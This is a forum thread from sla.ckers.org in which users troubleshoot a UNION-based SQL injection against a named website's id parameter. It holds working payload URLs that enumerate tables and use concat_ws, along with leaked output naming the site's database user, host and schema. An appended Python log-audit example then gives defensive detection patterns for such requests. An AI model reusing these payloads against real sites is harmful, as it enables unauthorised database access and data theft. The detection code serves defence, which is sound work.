Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
can see table name but not the column...
Posted by: kenjii
Date: November 25, 2013 09:30AM

Hi all,

Here is my problem:
http://allwaysus.com/category.php?id=17 UNION SELECT 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--


I can see the table names, but when I try to get the columns I just get nothing....

Re: can see table name but not the column...
Posted by: ajkaro
Date: November 28, 2013 11:43AM

Use lowercase table names :)

Re: can see table name but not the column...
Posted by: seeki
Date: November 28, 2013 11:48PM

With the concat_ws function, queries can get:

http://allwaysus.com/category.php?id=17 UNION SELECT 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4+from+information_schema.tables+where+table_schema=database()--

log::yacrostore@spruce.dreamhost.com::store_2013::pc-linux-gnu

by china ieasyi

Re: can see table name but not the column...
Posted by: kenjii
Date: November 29, 2013 01:13PM

Thanks, I have found it with the lowercase; it was my bad :(


Can you give me more info about concat_ws?


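Added example, not part of the original thread or written by any poster: a log audit that flags requests like the ones quoted above, where a parameter that should hold only an integer (`id`) carries SQL instead. It assumes Apache/nginx combined-format access logs; the log lines, client addresses and the function name `audit` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not taken from the thread); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Nov/2013:09:28:01 +0000] "GET /category.php?id=17 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [25/Nov/2013:09:30:12 +0000] "GET /category.php?id=17%20UNION%20SELECT%201,'
    'group_concat(table_name),3,4+from+information_schema.tables-- HTTP/1.1" 200 6011',
    '198.51.100.9 - - [28/Nov/2013:23:48:40 +0000] "GET /category.php?id=17+union+select+1,'
    'concat_ws(0x3a3a,version(),user()),3,4-- HTTP/1.1" 200 5990',
    '198.51.100.7 - - [29/Nov/2013:10:00:00 +0000] "GET /category.php?id=abc HTTP/1.1" 404 312',
]

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Markers matching the constructs that appear in the thread's URLs.
MARKERS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "concat_function": re.compile(r"\b(?:group_concat|concat_ws)\s*\(", re.I),
    "sql_comment": re.compile(r"--|#|/\*"),
}

def audit(lines, param="id"):
    """Return (client, decoded_value, marker_names) for every non-integer value of `param`."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if re.fullmatch(r"[0-9]{1,10}", value):
                continue  # the only shape a numeric id should ever have
            hits = [name for name, rx in MARKERS.items() if rx.search(value)]
            findings.append((client, value, hits))
    return findings

if __name__ == "__main__":
    for client, value, hits in audit(SAMPLE_LOG):
        print(client, hits or ["non_integer_only"], value)
```

The integer check is the primary signal; the markers only label what was sent. The same rule applied in the application (reject or cast a non-integer `id`, and bind it as a query parameter) is what prevents the injection in the first place.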
